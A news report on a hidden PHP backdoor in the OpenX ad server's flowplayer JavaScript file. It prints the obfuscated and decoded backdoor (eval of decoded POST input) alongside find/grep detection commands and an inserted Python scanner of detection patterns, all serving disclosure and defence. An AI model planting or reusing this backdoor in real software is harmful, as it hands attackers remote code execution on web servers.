If you installed the OpenX ad server in the past nine months, there's a chance hackers have a backdoor that gives them administrative control over your Web server, in many cases including passwords stored in databases, security researchers warned.

The hidden code in the proprietary open-source ad software was discovered by a reader of Heise Online, a well-known German tech news site, and it has since been confirmed by researchers from Sucuri. It has gone undetected since November and allows attackers to execute any PHP code of their choice on sites running a vulnerable OpenX version.

Coca-Cola, Bloomberg, Samsung, CBS Interactive, and eHarmony are just a small sampling of companies the OpenX website lists as customers. The software company, which also sells a proprietary version of the software, has raised more than $75 million in venture capital as of February 2013.

The backdoor is tucked deep inside a directory in the /plugins tree in a JavaScript file called flowplayer-3.1.1.min.js. Mixed in with the JavaScript code is a malicious PHP script that lets attackers use the "eval" function to execute any PHP code. Mingling the PHP code with JavaScript makes it harder to detect the backdoor. Still, it can be found by searching for PHP tags inside .js files or, better yet, running the following administrative command:

find . -name \*.js -exec grep -l '<?php' {} \;

Another command to see if your OpenX install has the backdoor is:

$ grep -r --include "*.js" '<?php' .

The full location of the backdoor is:

/plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js

The file looks like this:

this.each(function(){l=flashembed(this,k,j)} <?php /*if(e) {jQuery.tools=jQuery.tools||{version: {}};jQuery.tools.version.flashembed='1.0.2'; */$j='ex'./**/'plode'; /* if(this.className ...

After decoding, the backdoor looks like this:

<?php $j='explode'; $_=$j(",",'strrev,str_rot13,vastPlayer'); eval ( $_[1]($_[0]( $_POST[$_[2]])) );
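As an added example (not code from the article, Heise or Sucuri), here is a small Python scanner that extends the find/grep checks above: it flags any .js file containing a PHP open tag and rates the hit higher when eval() also reads request input or the strrev/str_rot13 decoders appear. The indicator names, verdict labels and the constructed sample files are this example's own assumptions.

```python
import re
import tempfile
from pathlib import Path

# Indicators drawn from the backdoor the article shows: a PHP open tag inside a
# .js file, eval() fed from a request variable, the strrev/str_rot13 decoder
# stack and the 'ex'./**/'plode' split literal. Names are this example's own.
INDICATORS = {
    "php_open_tag": re.compile(r"<\?(?:php\b|=)", re.IGNORECASE),
    "eval_call": re.compile(r"\beval\s*\(", re.IGNORECASE),
    "request_input": re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "decoder_functions": re.compile(r"\b(?:str_rot13|strrev|base64_decode|gzinflate)\b"),
    "split_literal": re.compile(r"'[A-Za-z_]+'\s*\.\s*(?:/\*.*?\*/\s*)*'[A-Za-z_]+'"),
}

def scan_text(text):
    """Return the names of all indicators found in one file's contents."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]

def classify(hits):
    """'clean' without a PHP tag; 'backdoor' if eval() also reads request input."""
    if "php_open_tag" not in hits:
        return "clean"
    if "eval_call" in hits and "request_input" in hits:
        return "backdoor"
    return "suspicious"

def scan_tree(root, extensions=(".js",)):
    """Walk root and report every non-clean file with the indicators it tripped."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in extensions:
            hits = scan_text(path.read_bytes().decode("latin-1"))  # minified JS may not be UTF-8
            verdict = classify(hits)
            if verdict != "clean":
                findings.append((str(path.relative_to(root)), verdict, hits))
    return findings

def demo():
    """Build a constructed two-file tree, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        player = Path(root, "plugins", "flowplayer")
        player.mkdir(parents=True)
        # Constructed samples: clean minified JS, and one carrying the indicators
        # inside a PHP comment so the file itself stays inert.
        Path(player, "clean.min.js").write_text("this.each(function(){l=flashembed(this,k,j)})")
        Path(player, "flowplayer-3.1.1.min.js").write_text(
            "this.each(function(){l=flashembed(this,k,j)}) <?php /* constructed: "
            "$j='ex'./**/'plode'; eval( $_POST['k'] ); str_rot13 strrev */ ?>")
        return scan_tree(root)
```

Run scan_tree() against your own web root (extend extensions to .css or .txt if your deployment carries other non-PHP text files) and treat any "backdoor" verdict as an incident, not a false positive to be tuned away.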

Daniel Cid, a researcher at Sucuri, has spent the past several hours combing through his company's intelligence logs and found no sign that any of the thousands of websites it tracked were accessed using the backdoor.

"The backdoor is very well hidden and hard to detect, explaining why it went undetected for so long," he wrote in an e-mail to Ars. "So I assume it was being used for very targeted attacks instead of mass malware distribution."

A representative for OpenX said company officials are aware of the reported backdoor and are declining comment until they have more details. According to Heise, the backdoor code has been removed from the OpenX server and the company's security team has begun work on an official advisory.

Until we get word from OpenX, it's hard to know just how serious this reported backdoor is. Still, the potential for abuse is high. Most content management systems store their passwords in a database, according to Cid. He added, "If the attackers have access to it, they can change passwords or add new users in there giving them full admin access."

Article updated to correct detail about open-source, add detail about proprietary version.